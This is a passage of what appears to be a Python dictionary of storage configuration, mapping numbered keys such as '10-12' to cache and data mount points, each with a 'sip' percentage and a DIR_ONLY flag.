'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'2-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'0-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'13-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'13-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'13-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'13-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'13-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'12-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'13-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-5': {'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'9-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'4-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'9-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'0-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'9-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'4-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'7-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'7-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'7-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'7-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'10-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'10-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'10-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'10-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'10-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'10-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'10-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'10-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'10-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'10-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'2-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
